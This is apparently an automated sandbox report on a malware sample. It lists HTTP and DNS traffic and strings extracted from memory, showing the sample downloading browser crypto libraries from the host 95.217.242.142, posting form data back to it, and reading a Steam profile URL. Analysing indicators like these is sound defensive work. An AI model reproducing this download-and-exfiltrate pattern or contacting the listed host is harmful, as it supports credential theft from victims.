Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RauG9dSpKm2dhpW&MD=978uZbzx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 95.217.242.142Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.1.dr, mozglue[1].dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199680449169[1].htm.1.dr	String found in binary or memory: https://95.217.242.142
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2107817674.0000000000F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/freebl3.dll
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/freebl3.dll7
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/mozglue.dll
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/mozglue.dll;
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/msvcp140.dll/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/msvcp140.dlly
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/nss3.dll
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/softokn3.dll
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/softokn3.dlli
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/sqlx.dll
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/vcruntime140.dll
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142/vcruntime140.dllp
Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.14217d99a9f0nt-Disposition:
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.242.142HJE
Source: BGCBGCAF.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199680449169[1].htm.1.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BGCBGCAF.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BGCBGCAF.1.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BGCBGCAF.1.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=98m_
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&l=e
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: BGCBGCAF.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BGCBGCAF.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BGCBGCAF.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199680449169
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, file.exe, 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2107817674.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680449169
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/badges
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/inventory/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199680449169jQ
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
